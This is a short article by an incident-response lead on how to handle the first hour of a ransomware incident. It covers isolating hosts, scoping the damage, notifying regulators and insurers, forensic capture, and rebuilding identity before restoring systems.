What we ask, do and document during the first sixty minutes of a ransomware incident — and why the next sixty hours depend almost entirely on how the first sixty went.
Tom Berghuis
Head of Incident Response
If you have ever sat in the first call of a ransomware incident, you know the temperature in the room. Six panicked people, a CEO who wants to know if 'the backups are okay', and a phone call to make to either a regulator or a law enforcement liaison — sometimes both. The next decisions ripple for weeks.
The instinct is to pull the plug; the discipline is to isolate. Network-isolate, do not power off — volatile memory and live processes carry investigative gold. Get a second pair of eyes on the EDR before anyone touches a host.
Identify which segments are affected, which credentials are likely compromised, and whether data has been staged for exfiltration. The presence of a Rclone or MEGA process is, in our caseload, the single most reliable predictor of double extortion.
Internal: stand up an out-of-band channel; assume your primary email and chat are compromised. External: counsel, cyber-insurer, regulator (under GDPR, the 72-hour clock has already started). Law enforcement liaison is a parallel call, not a sequential one.
Forensic acquisition of representative endpoints, domain controller volatility capture, log centralisation. In parallel: assessment of decryptable variants, restore feasibility, and (separately) the negotiation track if applicable.
The two streams must run together. Restoring into the same environment that was compromised buys you a second incident, often within a week. Identity rebuild, credential rotation, and a clean-network strategy are non-negotiable.